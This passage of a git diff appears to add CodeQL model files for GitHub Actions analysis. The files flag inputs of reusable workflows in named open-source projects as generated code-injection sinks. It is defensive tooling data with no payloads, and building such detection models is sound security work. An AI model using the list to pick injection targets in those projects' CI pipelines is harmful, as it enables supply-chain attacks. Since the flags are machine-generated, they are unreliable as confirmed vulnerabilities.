ql/lib/ext/generated/reusable-workflows/huggingface_doc-builder.model.yml create mode 100644 ql/lib/ext/generated/reusable-workflows/huggingface_transformers.model.yml create mode 100644 ql/lib/ext/generated/reusable-workflows/hyperion-project_hyperion.ng.model.yml create mode 100644 ql/lib/ext/generated/reusable-workflows/ibm_sarama.model.yml create mode 100644 ql/lib/ext/generated/reusable-workflows/icloud-photos-downloader_icloud_photos_downloader.model.yml create mode 100644 ql/lib/ext/generated/reusable-workflows/immich-app_immich.model.yml create mode 100644 ql/lib/ext/generated/reusable-workflows/inria_spoon.model.yml create mode 100644 ql/lib/ext/generated/reusable-workflows/intel_intel-device-plugins-for-kubernetes.model.yml create mode 100644 ql/lib/ext/generated/reusable-workflows/inverse-inc_packetfence.model.yml create mode 100644 ql/lib/ext/generated/reusable-workflows/ispc_ispc.model.yml create mode 100644 ql/lib/ext/generated/reusable-workflows/jetbrains_intellij-platform-gradle-plugin.model.yml create mode 100644 ql/lib/ext/generated/reusable-workflows/jupyter_docker-stacks.model.yml create mode 100644 ql/lib/ext/generated/reusable-workflows/kairos-io_kairos.model.yml create mode 100644 ql/lib/ext/generated/reusable-workflows/kanidm_kanidm.model.yml create mode 100644 ql/lib/ext/generated/reusable-workflows/kata-containers_kata-containers.model.yml create mode 100644 ql/lib/ext/generated/reusable-workflows/kiali_kiali.model.yml create mode 100644 ql/lib/ext/generated/reusable-workflows/kotest_kotest.model.yml create mode 100644 ql/lib/ext/generated/reusable-workflows/kubernetes_ingress-nginx.model.yml create mode 100644 ql/lib/ext/generated/reusable-workflows/kubescape_kubescape.model.yml create mode 100644 ql/lib/ext/generated/reusable-workflows/kubeshop_botkube.model.yml create mode 100644 ql/lib/ext/generated/reusable-workflows/kumahq_kuma.model.yml create mode 100644 ql/lib/ext/generated/reusable-workflows/labring_sealos.model.yml create mode 100644 ql/lib/ext/generated/reusable-workflows/laion-ai_open-assistant.model.yml create mode 100644 ql/lib/ext/generated/reusable-workflows/learningequality_kolibri.model.yml create mode 100644 ql/lib/ext/generated/reusable-workflows/lensesio_stream-reactor.model.yml create mode 100644 ql/lib/ext/generated/reusable-workflows/leptos-rs_leptos.model.yml create mode 100644 ql/lib/ext/generated/reusable-workflows/lightning-ai_pytorch-lightning.model.yml create mode 100644 ql/lib/ext/generated/reusable-workflows/liquibase_liquibase.model.yml create mode 100644 ql/lib/ext/generated/reusable-workflows/litestar-org_litestar.model.yml create mode 100644 ql/lib/ext/generated/reusable-workflows/llvm_circt.model.yml create mode 100644 ql/lib/ext/generated/reusable-workflows/lnbits_lnbits.model.yml create mode 100644 ql/lib/ext/generated/reusable-workflows/lutris_lutris.model.yml create mode 100644 ql/lib/ext/generated/reusable-workflows/mailu_mailu.model.yml create mode 100644 ql/lib/ext/generated/reusable-workflows/mamba-org_mamba.model.yml create mode 100644 ql/lib/ext/generated/reusable-workflows/manticoresoftware_manticoresearch.model.yml create mode 100644 ql/lib/ext/generated/reusable-workflows/marcelotduarte_cx_freeze.model.yml create mode 100644 ql/lib/ext/generated/reusable-workflows/materialdesigninxaml_materialdesigninxamltoolkit.model.yml create mode 100644 ql/lib/ext/generated/reusable-workflows/matter-labs_zksync-era.model.yml create mode 100644 ql/lib/ext/generated/reusable-workflows/mattermost_desktop.model.yml create mode 100644 ql/lib/ext/generated/reusable-workflows/mattermost_mattermost.model.yml create mode 100644 ql/lib/ext/generated/reusable-workflows/mealie-recipes_mealie.model.yml create mode 100644 ql/lib/ext/generated/reusable-workflows/meshery_meshery.model.yml create mode 100644 ql/lib/ext/generated/reusable-workflows/meshtastic_firmware.model.yml create mode 100644 ql/lib/ext/generated/reusable-workflows/microcks_microcks.model.yml create mode 100644 ql/lib/ext/generated/reusable-workflows/microsoft_applicationinsights-java.model.yml create mode 100644 ql/lib/ext/generated/reusable-workflows/microsoft_chat-copilot.model.yml create mode 100644 ql/lib/ext/generated/reusable-workflows/microsoft_msquic.model.yml create mode 100644 ql/lib/ext/generated/reusable-workflows/microsoft_oryx.model.yml create mode 100644 ql/lib/ext/generated/reusable-workflows/microsoft_pr-metrics.model.yml create mode 100644 ql/lib/ext/generated/reusable-workflows/microsoft_react-native-windows-samples.model.yml create mode 100644 ql/lib/ext/generated/reusable-workflows/microsoft_vscode-cpptools.model.yml create mode 100644 ql/lib/ext/generated/reusable-workflows/moby_buildkit.model.yml create mode 100644 ql/lib/ext/generated/reusable-workflows/moby_moby.model.yml create mode 100644 ql/lib/ext/generated/reusable-workflows/mosaicml_composer.model.yml create mode 100644 ql/lib/ext/generated/reusable-workflows/msys2_setup-msys2.model.yml create mode 100644 ql/lib/ext/generated/reusable-workflows/mudler_localai.model.yml create mode 100644 ql/lib/ext/generated/reusable-workflows/mustardchef_wsabuilds.model.yml create mode 100644 ql/lib/ext/generated/reusable-workflows/n8n-io_n8n.model.yml create mode 100644 ql/lib/ext/generated/reusable-workflows/napari_napari.model.yml create mode 100644 ql/lib/ext/generated/reusable-workflows/nasa_fprime.model.yml create mode 100644 ql/lib/ext/generated/reusable-workflows/nautobot_nautobot.model.yml create mode 100644 ql/lib/ext/generated/reusable-workflows/nektos_act.model.yml create mode 100644 ql/lib/ext/generated/reusable-workflows/neovim_neovim.model.yml create mode 100644 ql/lib/ext/generated/reusable-workflows/nethermindeth_nethermind.model.yml create mode 100644 ql/lib/ext/generated/reusable-workflows/newrelic_newrelic-dotnet-agent.model.yml create mode 100644 ql/lib/ext/generated/reusable-workflows/newrelic_newrelic-java-agent.model.yml create mode 100644 ql/lib/ext/generated/reusable-workflows/newrelic_node-newrelic.model.yml create mode 100644 ql/lib/ext/generated/reusable-workflows/nexus-mods_nexusmods.app.model.yml create mode 100644 ql/lib/ext/generated/reusable-workflows/nginxinc_kubernetes-ingress.model.yml create mode 100644 ql/lib/ext/generated/reusable-workflows/nocodb_nocodb.model.yml create mode 100644 ql/lib/ext/generated/reusable-workflows/novuhq_novu.model.yml create mode 100644 ql/lib/ext/generated/reusable-workflows/npm_abbrev-js.model.yml create mode 100644 ql/lib/ext/generated/reusable-workflows/npm_cli.model.yml create mode 100644 ql/lib/ext/generated/reusable-workflows/npm_fs-minipass.model.yml create mode 100644 ql/lib/ext/generated/reusable-workflows/npm_hosted-git-info.model.yml create mode 100644 ql/lib/ext/generated/reusable-workflows/npm_ini.model.yml create mode 100644 ql/lib/ext/generated/reusable-workflows/npm_json-parse-even-better-errors.model.yml create mode 100644 ql/lib/ext/generated/reusable-workflows/npm_minify-registry-metadata.model.yml create mode 100644 ql/lib/ext/generated/reusable-workflows/npm_mute-stream.model.yml create mode 100644 ql/lib/ext/generated/reusable-workflows/npm_node-semver.model.yml create mode 100644 ql/lib/ext/generated/reusable-workflows/npm_node-which.model.yml create mode 100644 ql/lib/ext/generated/reusable-workflows/npm_nopt.model.yml create mode 100644 ql/lib/ext/generated/reusable-workflows/npm_normalize-package-data.model.yml create mode 100644 ql/lib/ext/generated/reusable-workflows/npm_write-file-atomic.model.yml create mode 100644 ql/lib/ext/generated/reusable-workflows/onflow_cadence.model.yml create mode 100644 ql/lib/ext/generated/reusable-workflows/open-goal_jak-project.model.yml create mode 100644 ql/lib/ext/generated/reusable-workflows/open-telemetry_opentelemetry-demo.model.yml create mode 100644 ql/lib/ext/generated/reusable-workflows/open-telemetry_opentelemetry-dotnet-contrib.model.yml create mode 100644 ql/lib/ext/generated/reusable-workflows/open-telemetry_opentelemetry-dotnet.model.yml create mode 100644 ql/lib/ext/generated/reusable-workflows/open-telemetry_opentelemetry-java-instrumentation.model.yml create mode 100644 ql/lib/ext/generated/reusable-workflows/open-telemetry_opentelemetry-js-contrib.model.yml create mode 100644 ql/lib/ext/generated/reusable-workflows/open-telemetry_opentelemetry-operator.model.yml create mode 100644 ql/lib/ext/generated/reusable-workflows/openbao_openbao.model.yml create mode 100644 ql/lib/ext/generated/reusable-workflows/openhab_openhab-docs.model.yml create mode 100644 ql/lib/ext/generated/reusable-workflows/openmined_pysyft.model.yml create mode 100644 ql/lib/ext/generated/reusable-workflows/opentofu_opentofu.model.yml create mode 100644 ql/lib/ext/generated/reusable-workflows/openttd_openttd.model.yml create mode 100644 ql/lib/ext/generated/reusable-workflows/openvinotoolkit_openvino.model.yml create mode 100644 ql/lib/ext/generated/reusable-workflows/openxla_iree.model.yml create mode 100644 ql/lib/ext/generated/reusable-workflows/openzfs_zfs.model.yml create mode 100644 ql/lib/ext/generated/reusable-workflows/operator-framework_java-operator-sdk.model.yml create mode 100644 ql/lib/ext/generated/reusable-workflows/orange-opensource_hurl.model.yml create mode 100644 ql/lib/ext/generated/reusable-workflows/paolosalvatori_servicebusexplorer.model.yml create mode 100644 ql/lib/ext/generated/reusable-workflows/parcel-bundler_parcel.model.yml create mode 100644 ql/lib/ext/generated/reusable-workflows/pardeike_harmony.model.yml create mode 100644 ql/lib/ext/generated/reusable-workflows/pcsx2_pcsx2.model.yml create mode 100644 ql/lib/ext/generated/reusable-workflows/pennylaneai_pennylane.model.yml create mode 100644 ql/lib/ext/generated/reusable-workflows/pinecone-io_pinecone-python-client.model.yml create mode 100644 ql/lib/ext/generated/reusable-workflows/pixie-io_pixie.model.yml create mode 100644 ql/lib/ext/generated/reusable-workflows/plantuml_plantuml.model.yml create mode 100644 ql/lib/ext/generated/reusable-workflows/powerdns_pdns.model.yml create mode 100644 ql/lib/ext/generated/reusable-workflows/preactjs_preact.model.yml create mode 100644 ql/lib/ext/generated/reusable-workflows/prismlauncher_prismlauncher.model.yml create mode 100644 ql/lib/ext/generated/reusable-workflows/product-os_flowzone.model.yml create mode 100644 ql/lib/ext/generated/reusable-workflows/project-oak_oak.model.yml create mode 100644 ql/lib/ext/generated/reusable-workflows/prql_prql.model.yml create mode 100644 ql/lib/ext/generated/reusable-workflows/pulumi_pulumi.model.yml create mode 100644 ql/lib/ext/generated/reusable-workflows/puppetlabs_puppetlabs-puppetdb.model.yml create mode 100644 ql/lib/ext/generated/reusable-workflows/pyo3_maturin.model.yml create mode 100644 ql/lib/ext/generated/reusable-workflows/pyo3_pyo3.model.yml create mode 100644 ql/lib/ext/generated/reusable-workflows/python_cpython.model.yml create mode 100644 ql/lib/ext/generated/reusable-workflows/pytorch_botorch.model.yml create mode 100644 ql/lib/ext/generated/reusable-workflows/pytorch_xla.model.yml create mode 100644 ql/lib/ext/generated/reusable-workflows/quarto-dev_quarto-cli.model.yml create mode 100644 ql/lib/ext/generated/reusable-workflows/rancher_dashboard.model.yml create mode 100644 ql/lib/ext/generated/reusable-workflows/rasterio_rasterio.model.yml create mode 100644 ql/lib/ext/generated/reusable-workflows/redisearch_redisearch.model.yml create mode 100644 ql/lib/ext/generated/reusable-workflows/remix-run_remix.model.yml create mode 100644 ql/lib/ext/generated/reusable-workflows/rmcrackan_libation.model.yml create mode 100644 ql/lib/ext/generated/reusable-workflows/rocketchat_rocket.chat.model.yml create mode 100644 ql/lib/ext/generated/reusable-workflows/ruby_ruby.wasm.model.yml create mode 100644 ql/lib/ext/generated/reusable-workflows/rustdesk_rustdesk.model.yml create mode 100644 ql/lib/ext/generated/reusable-workflows/saadeghi_daisyui.model.yml create mode 100644 ql/lib/ext/generated/reusable-workflows/sagemath_sage.model.yml create mode 100644 ql/lib/ext/generated/reusable-workflows/schemastore_schemastore.model.yml create mode 100644 ql/lib/ext/generated/reusable-workflows/scikit-learn_scikit-learn.model.yml create mode 100644 ql/lib/ext/generated/reusable-workflows/seleniumhq_selenium.model.yml create mode 100644 ql/lib/ext/generated/reusable-workflows/shaka-project_shaka-packager.model.yml create mode 100644 ql/lib/ext/generated/reusable-workflows/shaka-project_shaka-player.model.yml create mode 100644 ql/lib/ext/generated/reusable-workflows/shimataro_ssh-key-action.model.yml create mode 100644 ql/lib/ext/generated/reusable-workflows/softfever_orcaslicer.model.yml create mode 100644 ql/lib/ext/generated/reusable-workflows/software-mansion_react-native-reanimated.model.yml create mode 100644 ql/lib/ext/generated/reusable-workflows/solana-labs_solana.model.yml create mode 100644 ql/lib/ext/generated/reusable-workflows/sonarr_sonarr.model.yml create mode 100644 ql/lib/ext/generated/reusable-workflows/speedb-io_speedb.model.yml create mode 100644 ql/lib/ext/generated/reusable-workflows/spring-cloud_spring-cloud-dataflow.model.yml create mode 100644 ql/lib/ext/generated/reusable-workflows/sqlfluff_sqlfluff.model.yml create mode 100644 ql/lib/ext/generated/reusable-workflows/stdlib-js_stdlib.model.yml create mode 100644 ql/lib/ext/generated/reusable-workflows/stereokit_stereokit.model.yml create mode 100644 ql/lib/ext/generated/reusable-workflows/streetsidesoftware_cspell.model.yml create mode 100644 ql/lib/ext/generated/reusable-workflows/supabase_auth.model.yml create mode 100644 ql/lib/ext/generated/reusable-workflows/supabase_cli.model.yml create mode 100644 ql/lib/ext/generated/reusable-workflows/tencent_hippy.model.yml create mode 100644 ql/lib/ext/generated/reusable-workflows/tgstation_tgstation.model.yml create mode 100644 ql/lib/ext/generated/reusable-workflows/thesofproject_sof.model.yml create mode 100644 ql/lib/ext/generated/reusable-workflows/tiann_kernelsu.model.yml create mode 100644 ql/lib/ext/generated/reusable-workflows/tiledb-inc_tiledb.model.yml create mode 100644 ql/lib/ext/generated/reusable-workflows/toeverything_affine.model.yml create mode 100644 ql/lib/ext/generated/reusable-workflows/tracel-ai_burn.model.yml create mode 100644 ql/lib/ext/generated/reusable-workflows/tribler_tribler.model.yml create mode 100644 ql/lib/ext/generated/reusable-workflows/ubisoft_sharpmake.model.yml create mode 100644 ql/lib/ext/generated/reusable-workflows/unity-technologies_ml-agents.model.yml create mode 100644 ql/lib/ext/generated/reusable-workflows/urbit_urbit.model.yml create mode 100644 ql/lib/ext/generated/reusable-workflows/uyuni-project_uyuni.model.yml create mode 100644 ql/lib/ext/generated/reusable-workflows/vert-x3_vertx-hazelcast.model.yml create mode 100644 ql/lib/ext/generated/reusable-workflows/vkcom_vkui.model.yml create mode 100644 ql/lib/ext/generated/reusable-workflows/walletconnect_web3modal.model.yml create mode 100644 ql/lib/ext/generated/reusable-workflows/warzone2100_warzone2100.model.yml create mode 100644 ql/lib/ext/generated/reusable-workflows/wasmedge_wasmedge.model.yml create mode 100644 ql/lib/ext/generated/reusable-workflows/web-infra-dev_rspack.model.yml create mode 100644 ql/lib/ext/generated/reusable-workflows/werf_werf.model.yml create mode 100644 ql/lib/ext/generated/reusable-workflows/widdix_aws-cf-templates.model.yml create mode 100644 ql/lib/ext/generated/reusable-workflows/wildfly_wildfly.model.yml create mode 100644 ql/lib/ext/generated/reusable-workflows/yt-dlp_yt-dlp.model.yml create mode 100644 ql/lib/ext/generated/reusable-workflows/zenml-io_zenml.model.yml create mode 100644 ql/lib/ext/generated/reusable-workflows/zephyrproject-rtos_zephyr.model.yml create mode 100644 ql/lib/ext/generated/reusable-workflows/zitadel_zitadel.model.yml diff --git a/ql/lib/ext/generated/reusable-workflows/0xpolygon_polygon-edge.model.yml b/ql/lib/ext/generated/reusable-workflows/0xpolygon_polygon-edge.model.yml new file mode 100644 index 000000000000..2e8a6683a576 --- /dev/null +++ b/ql/lib/ext/generated/reusable-workflows/0xpolygon_polygon-edge.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["0xpolygon/polygon-edge/.github/workflows/loadtest.yml", "*", "inputs.scenario", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/8vim_8vim.model.yml b/ql/lib/ext/generated/reusable-workflows/8vim_8vim.model.yml new file mode 100644 index 000000000000..55533f123127 --- /dev/null +++ b/ql/lib/ext/generated/reusable-workflows/8vim_8vim.model.yml @@ -0,0 +1,9 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["8vim/8vim/.github/workflows/publish.yaml", "*", "inputs.version_code", "code-injection", "generated"] + - ["8vim/8vim/.github/workflows/publish.yaml", "*", "inputs.version_name", "code-injection", "generated"] + - ["8vim/8vim/.github/workflows/bump-version.yaml", "*", "inputs.message", "code-injection", "generated"] + - ["8vim/8vim/.github/workflows/build.yaml", "*", "inputs.target", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/actions_reusable-workflows.model.yml b/ql/lib/ext/generated/reusable-workflows/actions_reusable-workflows.model.yml new file mode 100644 index 000000000000..a14d41a15b9c --- /dev/null +++ b/ql/lib/ext/generated/reusable-workflows/actions_reusable-workflows.model.yml @@ -0,0 +1,11 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["actions/reusable-workflows/.github/workflows/update-config-files.yml", "*", "inputs.base-pr-branch", "code-injection", "generated"] + - ["actions/reusable-workflows/.github/workflows/update-config-files.yml", "*", "inputs.head-pr-branch", "code-injection", "generated"] + - ["actions/reusable-workflows/.github/workflows/update-config-files.yml", "*", "inputs.reference-files", "code-injection", "generated"] + - ["actions/reusable-workflows/.github/workflows/update-config-files.yml", "*", "inputs.target-folder", "code-injection", "generated"] + - ["actions/reusable-workflows/.github/workflows/codeql-analysis.yml", "*", "inputs.build-command", "code-injection", "generated"] + - ["actions/reusable-workflows/.github/workflows/check-dist.yml", "*", "inputs.dist-path", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/adap_flower.model.yml b/ql/lib/ext/generated/reusable-workflows/adap_flower.model.yml new file mode 100644 index 000000000000..0888318ad93c --- /dev/null +++ b/ql/lib/ext/generated/reusable-workflows/adap_flower.model.yml @@ -0,0 +1,8 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["adap/flower/.github/workflows/_docker-build.yml", "*", "inputs.namespace-repository", "code-injection", "generated"] + - ["adap/flower/.github/workflows/_docker-build.yml", "*", "inputs.file-dir", "code-injection", "generated"] + - ["adap/flower/.github/workflows/_docker-build.yml", "*", "inputs.build-args", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/aio-libs_multidict.model.yml b/ql/lib/ext/generated/reusable-workflows/aio-libs_multidict.model.yml new file mode 100644 index 000000000000..6ea6dcdab704 --- /dev/null +++ b/ql/lib/ext/generated/reusable-workflows/aio-libs_multidict.model.yml @@ -0,0 +1,7 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["aio-libs/multidict/.github/workflows/reusable-build-wheel.yml", "*", "inputs.wheel-tags-to-skip", "code-injection", "generated"] + - ["aio-libs/multidict/.github/workflows/reusable-build-wheel.yml", "*", "inputs.qemu", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/aio-libs_yarl.model.yml b/ql/lib/ext/generated/reusable-workflows/aio-libs_yarl.model.yml new file mode 100644 index 000000000000..2c18a166cc1f --- /dev/null +++ b/ql/lib/ext/generated/reusable-workflows/aio-libs_yarl.model.yml @@ -0,0 +1,7 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["aio-libs/yarl/.github/workflows/reusable-build-wheel.yml", "*", "inputs.wheel-tags-to-skip", "code-injection", "generated"] + - ["aio-libs/yarl/.github/workflows/reusable-build-wheel.yml", "*", "inputs.qemu", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/airbytehq_airbyte.model.yml b/ql/lib/ext/generated/reusable-workflows/airbytehq_airbyte.model.yml new file mode 100644 index 000000000000..f065947dbdcc --- /dev/null +++ b/ql/lib/ext/generated/reusable-workflows/airbytehq_airbyte.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["airbytehq/airbyte/.github/workflows/connector-performance-command.yml", "*", "inputs.connector", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/alphagov_collections.model.yml b/ql/lib/ext/generated/reusable-workflows/alphagov_collections.model.yml new file mode 100644 index 000000000000..438525e77e23 --- /dev/null +++ b/ql/lib/ext/generated/reusable-workflows/alphagov_collections.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["alphagov/collections/.github/workflows/pact-verify.yml", "*", "inputs.pact_artifact_file_to_verify", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/alphagov_frontend.model.yml b/ql/lib/ext/generated/reusable-workflows/alphagov_frontend.model.yml new file mode 100644 index 000000000000..ca3111ad03af --- /dev/null +++ b/ql/lib/ext/generated/reusable-workflows/alphagov_frontend.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["alphagov/frontend/.github/workflows/pact-verify.yml", "*", "inputs.pact_artifact_file_to_verify", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/alphagov_publishing-api.model.yml b/ql/lib/ext/generated/reusable-workflows/alphagov_publishing-api.model.yml new file mode 100644 index 000000000000..1e09e05e8b62 --- /dev/null +++ b/ql/lib/ext/generated/reusable-workflows/alphagov_publishing-api.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["alphagov/publishing-api/.github/workflows/pact-verify.yml", "*", "inputs.pact_artifact_file_to_verify", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/apache_druid.model.yml b/ql/lib/ext/generated/reusable-workflows/apache_druid.model.yml new file mode 100644 index 000000000000..ad061ca714da --- /dev/null +++ b/ql/lib/ext/generated/reusable-workflows/apache_druid.model.yml @@ -0,0 +1,15 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["apache/druid/.github/workflows/reusable-unit-tests.yml", "*", "inputs.module", "code-injection", "generated"] + - ["apache/druid/.github/workflows/reusable-unit-tests.yml", "*", "inputs.jdk", "code-injection", "generated"] + - ["apache/druid/.github/workflows/reusable-unit-tests.yml", "*", "inputs.sql_compatibility", "code-injection", "generated"] + - ["apache/druid/.github/workflows/reusable-standard-its.yml", "*", "inputs.override_config_path", "code-injection", "generated"] + - ["apache/druid/.github/workflows/reusable-standard-its.yml", "*", "inputs.testing_groups", "code-injection", "generated"] + - ["apache/druid/.github/workflows/reusable-standard-its.yml", "*", "inputs.use_indexer", "code-injection", "generated"] + - ["apache/druid/.github/workflows/reusable-standard-its.yml", "*", "inputs.runtime_jdk", "code-injection", "generated"] + - ["apache/druid/.github/workflows/reusable-revised-its.yml", "*", "inputs.it", "code-injection", "generated"] + - ["apache/druid/.github/workflows/reusable-revised-its.yml", "*", "inputs.script", "code-injection", "generated"] + - ["apache/druid/.github/workflows/reusable-revised-its.yml", "*", "inputs.build_jdk", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/apache_flink.model.yml b/ql/lib/ext/generated/reusable-workflows/apache_flink.model.yml new file mode 100644 index 000000000000..3a721a0f2cf9 --- /dev/null +++ b/ql/lib/ext/generated/reusable-workflows/apache_flink.model.yml @@ -0,0 +1,7 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["apache/flink/.github/workflows/template.flink-ci.yml", "*", "inputs.environment", "code-injection", "generated"] + - ["apache/flink/.github/workflows/template.flink-ci.yml", "*", "inputs.workflow-caller-id", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/apache_spark.model.yml b/ql/lib/ext/generated/reusable-workflows/apache_spark.model.yml new file mode 100644 index 000000000000..bdabbb9ab609 --- /dev/null +++ b/ql/lib/ext/generated/reusable-workflows/apache_spark.model.yml @@ -0,0 +1,7 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["apache/spark/.github/workflows/build_and_test.yml", "*", "inputs.branch", "code-injection", "generated"] + - ["apache/spark/.github/workflows/build_and_test.yml", "*", "inputs.jobs", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/argilla-io_argilla.model.yml b/ql/lib/ext/generated/reusable-workflows/argilla-io_argilla.model.yml new file mode 100644 index 000000000000..6d8438462a8c --- /dev/null +++ b/ql/lib/ext/generated/reusable-workflows/argilla-io_argilla.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["argilla-io/argilla/.github/workflows/run-python-tests.yml", "*", "inputs.pytestArgs", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/argoproj_argo-cd.model.yml b/ql/lib/ext/generated/reusable-workflows/argoproj_argo-cd.model.yml new file mode 100644 index 000000000000..6d7bf7af0c2d --- /dev/null +++ b/ql/lib/ext/generated/reusable-workflows/argoproj_argo-cd.model.yml @@ -0,0 +1,8 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["argoproj/argo-cd/.github/workflows/image-reuse.yaml", "*", "inputs.docker_image_name", "code-injection", "generated"] + - ["argoproj/argo-cd/.github/workflows/image-reuse.yaml", "*", "inputs.ghcr_image_name", "code-injection", "generated"] + - ["argoproj/argo-cd/.github/workflows/image-reuse.yaml", "*", "inputs.quay_image_name", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/argoproj_argo-rollouts.model.yml b/ql/lib/ext/generated/reusable-workflows/argoproj_argo-rollouts.model.yml new file mode 100644 index 000000000000..b3b198fbf653 --- /dev/null +++ b/ql/lib/ext/generated/reusable-workflows/argoproj_argo-rollouts.model.yml @@ -0,0 +1,8 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["argoproj/argo-rollouts/.github/workflows/image-reuse.yaml", "*", "inputs.docker_image_name", "code-injection", "generated"] + - ["argoproj/argo-rollouts/.github/workflows/image-reuse.yaml", "*", "inputs.ghcr_image_name", "code-injection", "generated"] + - ["argoproj/argo-rollouts/.github/workflows/image-reuse.yaml", "*", "inputs.quay_image_name", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/aws-amplify_amplify-ui.model.yml b/ql/lib/ext/generated/reusable-workflows/aws-amplify_amplify-ui.model.yml new file mode 100644 index 000000000000..9c3ae9bf1946 --- /dev/null +++ b/ql/lib/ext/generated/reusable-workflows/aws-amplify_amplify-ui.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["aws-amplify/amplify-ui/.github/workflows/reusable-tagged-publish.yml", "*", "inputs.dist-tag", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/azure_apiops.model.yml b/ql/lib/ext/generated/reusable-workflows/azure_apiops.model.yml new file mode 100644 index 000000000000..68a85006c6cc --- /dev/null +++ b/ql/lib/ext/generated/reusable-workflows/azure_apiops.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["azure/apiops/tools/github_workflows/run-publisher-with-env.yaml", "*", "inputs.API_MANAGEMENT_SERVICE_OUTPUT_FOLDER_PATH", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/azure_mlops-templates.model.yml b/ql/lib/ext/generated/reusable-workflows/azure_mlops-templates.model.yml new file mode 100644 index 000000000000..ee336ee076c8 --- /dev/null +++ b/ql/lib/ext/generated/reusable-workflows/azure_mlops-templates.model.yml @@ -0,0 +1,13 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["azure/mlops-templates/.github/workflows/tf-gha-install-terraform.yml", "*", "inputs.terraform_workingdir", "code-injection", "generated"] + - ["azure/mlops-templates/.github/workflows/run-pipeline.yml", "*", "inputs.parameters-file", "code-injection", "generated"] + - ["azure/mlops-templates/.github/workflows/run-pipeline.yml", "*", "inputs.workspace_name", "code-injection", "generated"] + - ["azure/mlops-templates/.github/workflows/run-pipeline.yml", "*", "inputs.resource_group", "code-injection", "generated"] + - ["azure/mlops-templates/.github/workflows/register-environment.yml", "*", "inputs.dockerfile-location", "code-injection", "generated"] + - ["azure/mlops-templates/.github/workflows/register-environment.yml", "*", "inputs.environment_file", "code-injection", "generated"] + - ["azure/mlops-templates/.github/workflows/register-environment.yml", "*", "inputs.workspace_name", "code-injection", "generated"] + - ["azure/mlops-templates/.github/workflows/register-environment.yml", "*", "inputs.resource_group", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/bbq-beets_avocaddo-cmw.model.yml b/ql/lib/ext/generated/reusable-workflows/bbq-beets_avocaddo-cmw.model.yml new file mode 100644 index 000000000000..3d3f727923a0 --- /dev/null +++ b/ql/lib/ext/generated/reusable-workflows/bbq-beets_avocaddo-cmw.model.yml @@ -0,0 +1,9 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["bbq-beets/avocaddo-cmw/.github/workflows/mobile-ci-cd.yml", "*", "inputs.git-user-email", "code-injection", "generated"] + - ["bbq-beets/avocaddo-cmw/.github/workflows/mobile-ci-cd.yml", "*", "inputs.git-user-name", "code-injection", "generated"] + - ["bbq-beets/avocaddo-cmw/.github/workflows/mobile-ci-cd.yml", "*", "inputs.track", "code-injection", "generated"] + - ["bbq-beets/avocaddo-cmw/.github/workflows/mobile-ci-cd.yml", "*", "inputs.package-name", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/bbq-beets_mobile-ci-cd.model.yml 